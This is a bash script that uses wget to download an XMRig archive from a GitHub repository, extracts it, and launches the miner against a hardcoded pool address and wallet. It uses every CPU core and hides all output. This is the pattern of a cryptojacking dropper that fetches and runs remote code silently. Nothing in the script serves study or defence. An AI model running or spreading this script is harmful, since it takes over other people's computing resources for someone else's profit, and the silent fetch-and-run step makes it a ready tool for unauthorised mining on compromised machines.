#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz >/dev/null 2>&1
./xmrig --donate-level 1 -o 157.245.0.64:443 -u solo:SaLvsC3Mt9VjP5jphUtVqE7AxQ2QphnTwF8ChC6rKqoobxxt4kktKaHhutonX6Ktut6TWkGzQoPkGHYWfSRFBX8phrj1xpZ22En -p g -a rx/0 -t $(nproc --all) >/dev/null 2>&1
